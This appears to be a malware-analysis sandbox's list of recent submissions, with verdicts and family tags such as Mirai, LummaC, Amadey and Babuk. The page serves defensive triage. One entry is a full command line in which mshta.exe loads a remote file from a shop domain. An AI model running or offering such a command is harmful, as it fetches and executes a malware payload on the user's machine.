top title background image
Malware  Trends
flash

Detection Sample Info Download Report Classification & Info Graph
Clean
Alejandro Garrido.pdf
2024-12-21 23:56:40 +01:00
Info
Malicious
  • Yara
Mirai
AV: 32%
no Icon
la.bot.arc.elf
2024-12-21 23:56:04 +01:00
Info
Class
Malicious
  • Yara
Mirai
AV: 26%
no Icon
la.bot.arm7.elf
2024-12-21 23:31:07 +01:00
Info
Class
Malicious
  • Yara
Mirai
AV: 34%
no Icon
la.bot.sh4.elf
2024-12-21 23:26:07 +01:00
Info
Class
Malicious
  • Yara
Mirai
AV: 26%
no Icon
la.bot.sparc.elf
2024-12-21 23:21:10 +01:00
Info
Class
Malicious
  • Yara
Mirai
AV: 37%
no Icon
la.bot.arm6.elf
2024-12-21 23:21:07 +01:00
Info
Class
Malicious
  • Yara
Mirai
AV: 29%
no Icon
la.bot.powerpc.elf
2024-12-21 23:16:08 +01:00
Info
Class
Malicious
  • Yara
Mirai
AV: 26%
no Icon
la.bot.m68k.elf
2024-12-21 23:16:08 +01:00
Info
Class
Malicious
  • Yara
Mirai
AV: 34%
no Icon
la.bot.arm5.elf
2024-12-21 23:16:05 +01:00
Info
Class
Malicious
  • Yara
Mirai
AV: 34%
no Icon
la.bot.mips.elf
2024-12-21 23:11:04 +01:00
Info
Class
Clean
  • Suricata
https://giv.red/3yyxyamk
2024-12-21 22:46:57 +01:00
Info
Malicious
  • Yara
  • Sigma
  • Suricata
LummaC, Amadey, Credential Flusher, Lumm
AV: 87%
file.exe
2024-12-21 22:14:03 +01:00
Info
Class
Clean
Chrome installer.msi
2024-12-21 21:58:07 +01:00
Info
Malicious
  • Yara
  • Sigma
Python Stealer, Discord Token Stealer, P
AV: 24%
main.exe
2024-12-21 21:42:10 +01:00
Info
Class
Malicious
  • Yara
Mirai
AV: 34%
no Icon
nshkarm7.elf
2024-12-21 21:41:03 +01:00
Info
Class
Malicious
  • Yara
  • Sigma
  • Suricata
LummaC
AV: None
no Icon
"C:\WINDOWS\system32\mshta.exe" https://savecoupons.shop/singl6.mp4
2024-12-21 21:02:31 +01:00
Info
Class
Malicious
  • Yara
Mirai, Moobot
AV: 71%
no Icon
mips.elf
2024-12-21 20:51:08 +01:00
Info
Class
Malicious
  • Yara
Mirai, Moobot
AV: 71%
no Icon
sh4.elf
2024-12-21 20:41:05 +01:00
Info
Class
Malicious
  • Yara
Babuk
AV: 83%
4.exe
2024-12-21 20:17:02 +01:00
Info
Class
Malicious
  • Yara
  • Sigma
LummaC, Amadey, Credential Flusher, Lumm
AV: 87%
file.exe
2024-12-21 20:14:09 +01:00
Info
Class
Windows: InjectsWrites Registry keysDrops PE FilesHas more than one ProcessHas Email attachmentDisassembly is available
Android: Receives SMS Sends SMS Reboot Native CMD
Common: Generates Internet Traffic Generates HTTP Network Traffic Expired Sample Creates malicious files Contains malware configuration(s)
Customization Show ID column